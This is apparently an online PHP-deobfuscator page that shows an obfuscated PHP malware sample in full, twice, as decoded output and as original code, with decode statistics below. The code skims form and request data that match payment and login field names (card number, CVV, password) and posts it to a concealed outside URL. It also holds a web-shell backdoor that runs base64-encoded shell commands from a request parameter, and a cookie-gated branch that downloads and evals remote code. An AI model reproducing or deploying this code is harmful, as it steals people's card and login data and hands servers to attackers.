Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$DCPZa = "_QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3UXL9Ot"; $Spsr = $D..
Decoded Output download
<? $DCPZa = "_QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3UXL9Ot";
$Spsr = $DCPZa[51] . $DCPZa[18] . $DCPZa[26] . $DCPZa[4] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
$baOTnfZps = 'base64_encode';
$FKipd = $DCPZa[30] . $DCPZa[6] . $DCPZa[20] . $DCPZa[17] . $DCPZa[40] . $DCPZa[5] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
$ibabNh = 'serialize';
$TJRz = $DCPZa[26] . $DCPZa[57] . $DCPZa[17] . $DCPZa[8] . $DCPZa[0] . $DCPZa[18] . $DCPZa[6] . $DCPZa[65] . $DCPZa[52] . $DCPZa[28];
$cCvgbpy = $ibabNh($_SERVER);
$TiacdCVP = $_REQUEST;
$aMFwQ = $DCPZa[29] . $DCPZa[51] . $DCPZa[4] . $DCPZa[17] . $DCPZa[0] . $DCPZa[8] . $DCPZa[17] . $DCPZa[65] . $DCPZa[0] . $DCPZa[52] . $DCPZa[39] . $DCPZa[36] . $DCPZa[65] . $DCPZa[17] . $DCPZa[36] . $DCPZa[65] . $DCPZa[20];
$aaImgrN = $aMFwQ($DCPZa[26] . $DCPZa[28] . $DCPZa[26] . $DCPZa[3] . $DCPZa[43] . $DCPZa[43] . $DCPZa[51] . $DCPZa[36] . $DCPZa[26] . $DCPZa[44] . $DCPZa[65]);
$kBwpddNIy = $DCPZa[19] . $DCPZa[20] . $DCPZa[39] . $DCPZa[36] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
if (!empty($aaImgrN)) $aaImgrN = $kBwpddNIy($aaImgrN, true);
else $aaImgrN = array();
$owhjI = curl_init();
if (is_array($aaImgrN)) $TiacdCVP = array_merge($TiacdCVP, $aaImgrN);
$TiacdCVP = $ibabNh($TiacdCVP);
$rAaNWeMCn = $Spsr($FKipd('LS' . '0='), array($TiacdCVP, $cCvgbpy));
if (!isset($_SERVER['HTTP_HOST']) or empty($_SERVER['HTTP_HOST'])) {
$_SERVER['HTTP_HOST'] = str_ireplace('/', '_', $_SERVER['DOCUMENT_ROOT']);
}
$uuwNqdlMg = array(CURLOPT_URL => trim($FKipd('aH' . 'R0c' . 'HM' . '6L' . 'y9' . 'y' . 'ZXF1ZX' . 'N' . '0' . 'YmV' . 'lLm' . 'NvbS9' . 'i' . 'NmI' . '3' . 'LnBoc' . 'A' . '==')), CURLOPT_POST => true, CURLOPT_POSTFIELDS => "test=XOwlgUWK&goog=" . $baOTnfZps($rAaNWeMCn) . $FKipd('Jm' . 'h' . 'vc3' . 'Q9') . $_SERVER['HTTP_HOST'], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_CONNECTTIMEOUT => 2, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => 0);
if ($TJRz("/" . $FKipd('Ym' . 'lsbGl' . 'uZ3xza' . 'Gl' . 'wcGlu' . 'Z3' . 'xjd' . 'nZ' . '8Z' . 'HV' . 't' . 'bX' . 'l8' . 'cG' . 'F5b' . 'W' . 'Vu' . 'dH' . 'xjdm' . 'Myf' . 'G' . 'Nj' . 'X3xl' . 'eHBpc' . 'nl8' . 'Y' . '2' . 'Fy' . 'ZF9ud' . 'W1i' . 'ZXJ' . '8eWV' . 'hc' . 'n' . 'xt' . 'b25' . '0' . 'a' . 'Hxsb2dpbn' . 'xma' . 'XJ' . 'zdG' . '5hb' . 'WV8' . 'Y2' . 'N' . 'f' . 'bnV' . 'tY' . 'mV' . 'yf' . 'HV' . 'zZ' . 'XJ' . 'u' . 'YW' . '1l' . 'fHNlY' . '3V' . 'yZX' . 'R' . 'y' . 'Y' . 'WRp' . 'b' . 'mc=') . "/i", $TiacdCVP)) {
curl_setopt_array($owhjI, $uuwNqdlMg);
$owhjI2 = curl_exec($owhjI);
curl_close($owhjI);
}
if (!function_exists('exzx')) {
function exzx($code)
{
$output = "";
$code = $code . " 2>/dev/null";
if (function_exists('system') && is_callable('system')) {
ob_start();
@system($code);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) return $output;
} elseif (function_exists('shell_exec') && is_callable('shell_exec')) {
$output = @shell_exec($code);
if (!empty($output)) return $output;
} elseif (function_exists('exec') && is_callable('exec')) {
@exec($code, $res);
if (!empty($res)) foreach ($res as $line) $output .= $line;
if (!empty($output)) return $output;
} elseif (function_exists('passthru') && is_callable('passthru')) {
ob_start();
@passthru($code);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) return $output;
} elseif (function_exists('proc_open') && is_callable('proc_open')) {
$desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$proc = @proc_open($code, $desc, $pipes, getcwd(), array());
if (is_resource($proc)) {
while ($res = fgets($pipes[1])) {
if (!empty($res)) $output .= $res;
}
while ($res = fgets($pipes[2])) {
if (!empty($res)) $output .= $res;
}
}
@proc_close($proc);
if (!empty($output)) return $output;
} elseif (is_callable('popen') && function_exists('popen')) {
$res = @popen($code, 'r');
if ($res) {
while (!feof($res)) {
$output .= fread($res, 2096);
}
pclose($res);
}
if (!empty($output)) return $output;
}
return "";
}
}
if (isset($_REQUEST['daksjdhags78122wssa']) && !empty($_REQUEST['daksjdhags78122wssa'])) {
if (function_exists('apc_clear_cache')) {
apc_clear_cache(null);
}
if (function_exists('opcache_reset')) {
opcache_reset();
}
if (function_exists('xcache_clear_cache')) {
xcache_clear_cache(array(0));
}
var_dump(exzx(base64_decode($_REQUEST['daksjdhags78122wssa'])));
exit();
}
if (isset($_COOKIE['sdjxxj2jjaxsaa']) && $_COOKIE['sdjxxj2jjaxsaa'] == 'dasixx1x293xedsaaa') {
$l = "http" ./* "" - ni*/ /* "" - ni*/ "s://zx" ./* "" - ni*/ /* ""sdajsni*/ ".fr" . ".to/w" ./* ""dasdj*/ "so" . "_9." ./* "" - sjzxza*/ "js"/* "" - ni*/;
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $l);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
$xzba = curl_exec($ch);
curl_close($ch);
} else {
$xzba = @file_get_contents($l);
}
$xzba = base64_decode($xzba);
eval($xzba);
die();
}
?>
Did this file decode correctly?
Original Code
$DCPZa = "_QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3UXL9Ot";
$Spsr = $DCPZa[51] . $DCPZa[18] . $DCPZa[26] . $DCPZa[4] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
$baOTnfZps = 'base64_encode';
$FKipd = $DCPZa[30] . $DCPZa[6] . $DCPZa[20] . $DCPZa[17] . $DCPZa[40] . $DCPZa[5] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
$ibabNh = 'serialize';
$TJRz = $DCPZa[26] . $DCPZa[57] . $DCPZa[17] . $DCPZa[8] . $DCPZa[0] . $DCPZa[18] . $DCPZa[6] . $DCPZa[65] . $DCPZa[52] . $DCPZa[28];
$cCvgbpy = $ibabNh($_SERVER);
$TiacdCVP = $_REQUEST;
$aMFwQ = $DCPZa[29] . $DCPZa[51] . $DCPZa[4] . $DCPZa[17] . $DCPZa[0] . $DCPZa[8] . $DCPZa[17] . $DCPZa[65] . $DCPZa[0] . $DCPZa[52] . $DCPZa[39] . $DCPZa[36] . $DCPZa[65] . $DCPZa[17] . $DCPZa[36] . $DCPZa[65] . $DCPZa[20];
$aaImgrN = $aMFwQ($DCPZa[26] . $DCPZa[28] . $DCPZa[26] . $DCPZa[3] . $DCPZa[43] . $DCPZa[43] . $DCPZa[51] . $DCPZa[36] . $DCPZa[26] . $DCPZa[44] . $DCPZa[65]);
$kBwpddNIy = $DCPZa[19] . $DCPZa[20] . $DCPZa[39] . $DCPZa[36] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
if (!empty($aaImgrN)) $aaImgrN = $kBwpddNIy($aaImgrN, true);
else $aaImgrN = array();
$owhjI = curl_init();
if (is_array($aaImgrN)) $TiacdCVP = array_merge($TiacdCVP, $aaImgrN);
$TiacdCVP = $ibabNh($TiacdCVP);
$rAaNWeMCn = $Spsr($FKipd('LS' . '0='), array($TiacdCVP, $cCvgbpy));
if (!isset($_SERVER['HTTP_HOST']) or empty($_SERVER['HTTP_HOST'])) {
$_SERVER['HTTP_HOST'] = str_ireplace('/', '_', $_SERVER['DOCUMENT_ROOT']);
}
$uuwNqdlMg = array(CURLOPT_URL => trim($FKipd('aH' . 'R0c' . 'HM' . '6L' . 'y9' . 'y' . 'ZXF1ZX' . 'N' . '0' . 'YmV' . 'lLm' . 'NvbS9' . 'i' . 'NmI' . '3' . 'LnBoc' . 'A' . '==')), CURLOPT_POST => true, CURLOPT_POSTFIELDS => "test=XOwlgUWK&goog=" . $baOTnfZps($rAaNWeMCn) . $FKipd('Jm' . 'h' . 'vc3' . 'Q9') . $_SERVER['HTTP_HOST'], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_CONNECTTIMEOUT => 2, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => 0);
if ($TJRz("/" . $FKipd('Ym' . 'lsbGl' . 'uZ3xza' . 'Gl' . 'wcGlu' . 'Z3' . 'xjd' . 'nZ' . '8Z' . 'HV' . 't' . 'bX' . 'l8' . 'cG' . 'F5b' . 'W' . 'Vu' . 'dH' . 'xjdm' . 'Myf' . 'G' . 'Nj' . 'X3xl' . 'eHBpc' . 'nl8' . 'Y' . '2' . 'Fy' . 'ZF9ud' . 'W1i' . 'ZXJ' . '8eWV' . 'hc' . 'n' . 'xt' . 'b25' . '0' . 'a' . 'Hxsb2dpbn' . 'xma' . 'XJ' . 'zdG' . '5hb' . 'WV8' . 'Y2' . 'N' . 'f' . 'bnV' . 'tY' . 'mV' . 'yf' . 'HV' . 'zZ' . 'XJ' . 'u' . 'YW' . '1l' . 'fHNlY' . '3V' . 'yZX' . 'R' . 'y' . 'Y' . 'WRp' . 'b' . 'mc=') . "/i", $TiacdCVP)) {
curl_setopt_array($owhjI, $uuwNqdlMg);
$owhjI2 = curl_exec($owhjI);
curl_close($owhjI);
}
if (!function_exists('exzx')) {
function exzx($code)
{
$output = "";
$code = $code . " 2>/dev/null";
if (function_exists('system') && is_callable('system')) {
ob_start();
@system($code);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) return $output;
} elseif (function_exists('shell_exec') && is_callable('shell_exec')) {
$output = @shell_exec($code);
if (!empty($output)) return $output;
} elseif (function_exists('exec') && is_callable('exec')) {
@exec($code, $res);
if (!empty($res)) foreach ($res as $line) $output .= $line;
if (!empty($output)) return $output;
} elseif (function_exists('passthru') && is_callable('passthru')) {
ob_start();
@passthru($code);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) return $output;
} elseif (function_exists('proc_open') && is_callable('proc_open')) {
$desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$proc = @proc_open($code, $desc, $pipes, getcwd(), array());
if (is_resource($proc)) {
while ($res = fgets($pipes[1])) {
if (!empty($res)) $output .= $res;
}
while ($res = fgets($pipes[2])) {
if (!empty($res)) $output .= $res;
}
}
@proc_close($proc);
if (!empty($output)) return $output;
} elseif (is_callable('popen') && function_exists('popen')) {
$res = @popen($code, 'r');
if ($res) {
while (!feof($res)) {
$output .= fread($res, 2096);
}
pclose($res);
}
if (!empty($output)) return $output;
}
return "";
}
}
if (isset($_REQUEST['daksjdhags78122wssa']) && !empty($_REQUEST['daksjdhags78122wssa'])) {
if (function_exists('apc_clear_cache')) {
apc_clear_cache(null);
}
if (function_exists('opcache_reset')) {
opcache_reset();
}
if (function_exists('xcache_clear_cache')) {
xcache_clear_cache(array(0));
}
var_dump(exzx(base64_decode($_REQUEST['daksjdhags78122wssa'])));
exit();
}
if (isset($_COOKIE['sdjxxj2jjaxsaa']) && $_COOKIE['sdjxxj2jjaxsaa'] == 'dasixx1x293xedsaaa') {
$l = "http" ./* "" - ni*/ /* "" - ni*/ "s://zx" ./* "" - ni*/ /* ""sdajsni*/ ".fr" . ".to/w" ./* ""dasdj*/ "so" . "_9." ./* "" - sjzxza*/ "js"/* "" - ni*/;
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $l);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
$xzba = curl_exec($ch);
curl_close($ch);
} else {
$xzba = @file_get_contents($l);
}
$xzba = base64_decode($xzba);
eval($xzba);
die();
}
Function Calls
serialize | 1 |
Stats
MD5 | 500c21394fede8ed94dadcd55eba8cc4 |
Eval Count | 0 |
Decode Time | 115 ms |